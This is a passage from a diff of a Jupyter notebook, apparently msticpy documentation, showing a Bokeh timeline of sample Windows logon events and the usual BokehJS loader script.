rce\":{\"id\":\"5577\"}},\"id\":\"5581\",\"type\":\"CDSView\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"5519\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"range\":null,\"value\":0.5},\"id\":\"5527\",\"type\":\"Dodge\"},{\"attributes\":{\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5,\"syncable\":false},\"id\":\"5565\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"num_minor_ticks\":5,\"tickers\":[{\"id\":\"5625\"},{\"id\":\"5626\"},{\"id\":\"5627\"},{\"id\":\"5628\"},{\"id\":\"5629\"},{\"id\":\"5630\"},{\"id\":\"5631\"},{\"id\":\"5632\"},{\"id\":\"5633\"},{\"id\":\"5634\"},{\"id\":\"5635\"},{\"id\":\"5636\"}]},\"id\":\"5551\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"end\":1547530591064.3,\"start\":1547515271728.7},\"id\":\"5499\",\"type\":\"Range1d\"},{\"attributes\":{\"line_alpha\":0.5,\"line_color\":\"red\",\"line_dash\":[6],\"x\":{\"field\":\"x\"},\"y\":{\"field\":\"y\"}},\"id\":\"5578\",\"type\":\"Line\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"5611\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"5609\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"line_alpha\":0.1,\"line_color\":\"red\",\"line_dash\":[6],\"x\":{\"field\":\"x\"},\"y\":{\"field\":\"y\"}},\"id\":\"5573\",\"type\":\"Line\"},{\"attributes\":{\"data\":{\"Account\":[\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"NT AUTHORITY\\\\SYSTEM\",\"MSTICAlertsWin1\\\\adm1nistrator\"],\"AuthenticationPackageName\":[\"Negotiate\",\"Negotiate\",\"Negotiate\",\"Negotiate\",\"Negotiate\",\"Negotiate\",\"Negotiate\",\"Negotiate\",\"Negotiate\",\"Negotiate\",\"Negotiate\",\"Negotiate\",\"Negotiate\",\"NTLM\"],\"Center\":{\"__ndarray__\":\"ADCsnv2EdkIAMKye/YR2QgBIrN/4hHZCAEis3/iEdkIASKzf+IR2QgBIrN/4hHZCAEis3/iEdkIASKzf+IR2QgBIrN/4hHZCAEis3/iEdkIASKzf+IR2QgBIrN/4hHZCAEis3/iEdkIAsA/0/oR2Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[14]},\"Computer\":[\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\"],\"EventID\":[4624,4624,4624,4624,4624,4624,4624,4624,4624,4624,4624,4624,4624,4624],\"IpAddress\":[\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"fe80::38dc:e4a9:61bd:b458\"],\"LogonProcessName\":[\"Advapi  \",\"Advapi  \",\"Advapi  \",\"Advapi  \",\"Advapi  \",\"Advapi  \",\"Advapi  \",\"Advapi  \",\"Advapi  \",\"Advapi  \",\"Advapi  \",\"Advapi  \",\"Advapi  \",\"NtLmSsp \"],\"LogonType\":[4,4,5,5,5,5,5,5,5,5,5,5,5,3],\"Row\":[0,0,2,2,2,2,2,2,2,2,2,2,2,1],\"SourceComputerId\":[\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\",\"46fe7078-61bb-4bed-9430-7ac01d91c273\"],\"Status\":{\"__ndarray__\":\"AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fwAAAAAAAPh/AAAAAAAA+H8AAAAAAAD4fw==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[14]},\"SubjectDomainName\":[\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"-\"],\"SubjectUserName\":[\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"-\"],\"SubjectUserSid\":[\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-0-0\"],\"TargetDomainName\":[\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"NT AUTHORITY\",\"NT AUTHORITY\",\"NT AUTHORITY\",\"NT AUTHORITY\",\"NT AUTHORITY\",\"NT AUTHORITY\",\"NT AUTHORITY\",\"NT AUTHORITY\",\"NT AUTHORITY\",\"NT AUTHORITY\",\"NT AUTHORITY\",\"MSTICAlertsWin1\"],\"TargetLogonId\":[\"0xfaac27\",\"0xf0c9d6\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0xfb5ee6\"],\"TargetUserName\":[\"MSTICAdmin\",\"MSTICAdmin\",\"SYSTEM\",\"SYSTEM\",\"SYSTEM\",\"SYSTEM\",\"SYSTEM\",\"SYSTEM\",\"SYSTEM\",\"SYSTEM\",\"SYSTEM\",\"SYSTEM\",\"SYSTEM\",\"adm1nistrator\"],\"TargetUserSid\":[\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-1066\"],\"TenantId\":[\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\"],\"TimeGenerated\":{\"__ndarray__\":\"AEA88/6EdkIAIBxK/IR2QgBwm/P+hHZCANAl9f6EdkIAUAn2/oR2QgAQs3j4hHZCAFBFefiEdkIAEE1p9oR2QgDw3mn2hHZCAEBPyfKEdkIAoBn08oR2QgCQ2sj3hHZCALBtyfeEdkIAsA/0/oR2Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[14]},\"Width\":{\"__ndarray__\":\"AAAAAAFJRUEAAAAAAUlFQQAAACB0WWhBAAAAIHRZaEEAAAAgdFloQQAAACB0WWhBAAAAIHRZaEEAAAAgdFloQQAAACB0WWhBAAAAIHRZaEEAAAAgdFloQQAAACB0WWhBAAAAIHRZaEEAAAAAAAAAAA==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[14]},\"WorkstationName\":[\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"MSTICAlertsWin1\"],\"end_time\":{\"__ndarray__\":\"AEA88/6EdkIAQDzz/oR2QgBQCfb+hHZCAFAJ9v6EdkIAUAn2/oR2QgBQCfb+hHZCAFAJ9v6EdkIAUAn2/oR2QgBQCfb+hHZCAFAJ9v6EdkIAUAn2/oR2QgBQCfb+hHZCAFAJ9v6EdkIAsA/0/oR2Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[14]},\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13],\"start_time\":{\"__ndarray__\":\"ACAcSvyEdkIAIBxK/IR2QgBAT8nyhHZCAEBPyfKEdkIAQE/J8oR2QgBAT8nyhHZCAEBPyfKEdkIAQE/J8oR2QgBAT8nyhHZCAEBPyfKEdkIAQE/J8oR2QgBAT8nyhHZCAEBPyfKEdkIAsA/0/oR2Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[14]}},\"selected\":{\"id\":\"5623\"},\"selection_policy\":{\"id\":\"5624\"}},\"id\":\"5558\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"5610\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"5577\"},\"glyph\":{\"id\":\"5578\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"5579\"},\"view\":{\"id\":\"5581\"}},\"id\":\"5580\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"background_fill_alpha\":0.3,\"background_fill_color\":\"white\",\"border_line_alpha\":0.3,\"border_line_color\":\"red\",\"render_mode\":\"css\",\"text\":\"< SYSTEM\",\"text_alpha\":0.5,\"text_font_size\":\"8pt\",\"x\":1547522511957.0,\"y\":0,\"y_offset\":20},\"id\":\"5582\",\"type\":\"Label\"},{\"attributes\":{\"background_fill_alpha\":0.3,\"background_fill_color\":\"white\",\"border_line_alpha\":0.3,\"border_line_color\":\"red\",\"render_mode\":\"css\",\"text\":\"< adm1nistrator\",\"text_alpha\":0.5,\"text_font_size\":\"8pt\",\"x\":1547529306363.0,\"y\":0,\"y_offset\":30},\"id\":\"5588\",\"type\":\"Label\"},{\"attributes\":{\"axis\":{\"id\":\"5550\"},\"ticker\":null},\"id\":\"5553\",\"type\":\"Grid\"},{\"attributes\":{\"line_alpha\":0.1,\"line_color\":\"red\",\"line_dash\":[6],\"x\":{\"field\":\"x\"},\"y\":{\"field\":\"y\"}},\"id\":\"5579\",\"type\":\"Line\"},{\"attributes\":{\"source\":{\"id\":\"5583\"}},\"id\":\"5587\",\"type\":\"CDSView\"},{\"attributes\":{\"data_source\":{\"id\":\"5583\"},\"glyph\":{\"id\":\"5584\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"5585\"},\"view\":{\"id\":\"5587\"}},\"id\":\"5586\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"navy\"},\"height\":{\"value\":0.3},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"navy\"},\"width\":{\"field\":\"Width\"},\"x\":{\"field\":\"Center\"},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"5527\"}}},\"id\":\"5530\",\"type\":\"Rect\"},{\"attributes\":{\"active_multi\":{\"id\":\"5564\"},\"tools\":[{\"id\":\"5564\"}]},\"id\":\"5554\",\"type\":\"Toolbar\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"5613\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"5607\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"below\":[{\"id\":\"5550\"},{\"id\":\"5555\"}],\"center\":[{\"id\":\"5553\"}],\"height\":120,\"renderers\":[{\"id\":\"5562\"}],\"title\":{\"id\":\"5540\"},\"toolbar\":{\"id\":\"5554\"},\"toolbar_location\":null,\"width\":900,\"x_range\":{\"id\":\"5542\"},\"x_scale\":{\"id\":\"5546\"},\"y_range\":{\"id\":\"5544\"},\"y_scale\":{\"id\":\"5548\"}},\"id\":\"5539\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{},\"id\":\"5600\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"5601\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"5608\",\"type\":\"Selection\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"5612\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.4},\"fill_color\":{\"value\":\"navy\"},\"height\":{\"value\":0.3},\"line_color\":{\"value\":\"navy\"},\"width\":{\"field\":\"Width\"},\"x\":{\"field\":\"Center\"},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"5527\"}}},\"id\":\"5529\",\"type\":\"Rect\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"5556\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"text\":\"Event Duration Timeline for Account\"},\"id\":\"5497\",\"type\":\"Title\"},{\"attributes\":{\"background_fill_alpha\":0.3,\"background_fill_color\":\"white\",\"border_line_alpha\":0.3,\"border_line_color\":\"red\",\"render_mode\":\"css\",\"text\":\"< SYSTEM\",\"text_alpha\":0.5,\"text_font_size\":\"8pt\",\"x\":1547516548340.0,\"y\":0,\"y_offset\":10},\"id\":\"5576\",\"type\":\"Label\"},{\"attributes\":{\"data\":{\"x\":[1547522511957.0,1547522511957.0],\"y\":[0,3]},\"selected\":{\"id\":\"5606\"},\"selection_policy\":{\"id\":\"5607\"}},\"id\":\"5577\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"5617\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"5614\",\"type\":\"DaysTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"5571\"},\"glyph\":{\"id\":\"5572\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"5573\"},\"view\":{\"id\":\"5575\"}},\"id\":\"5574\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"5615\",\"type\":\"DaysTicker\"},{\"attributes\":{\"axis\":{\"id\":\"5511\"},\"dimension\":1,\"grid_line_color\":null,\"ticker\":null},\"id\":\"5513\",\"type\":\"Grid\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"5616\",\"type\":\"DaysTicker\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"5618\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"source\":{\"id\":\"5571\"}},\"id\":\"5575\",\"type\":\"CDSView\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"5619\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"5620\",\"type\":\"MonthsTicker\"}],\"root_ids\":[\"5589\"]},\"title\":\"Bokeh Application\",\"version\":\"2.3.2\"}};\n  var render_items = [{\"docid\":\"efae7d54-c0ab-494f-b948-ebe0ca5c6d45\",\"root_ids\":[\"5589\"],\"roots\":{\"5589\":\"fb8392a3-5412-4cc2-95ca-bd031d691548\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);",
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "5589"
+      }
+     },
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "from msticpy.nbtools.timeline_duration import display_timeline_duration\r\n",
+    "\r\n",
+    "display_timeline_duration(\r\n",
+    "    host_logons,\r\n",
+    "    group_by=\"Account\",\r\n",
+    "    ref_events=host_logons.sample(3),\r\n",
+    "    ref_col=\"TargetUserName\",\r\n",
+    ");"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 15,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"5872\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"5872\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"5872\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"c922d6c6-c56d-4381-be5a-3c2f890b6870\" data-root-id=\"5951\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
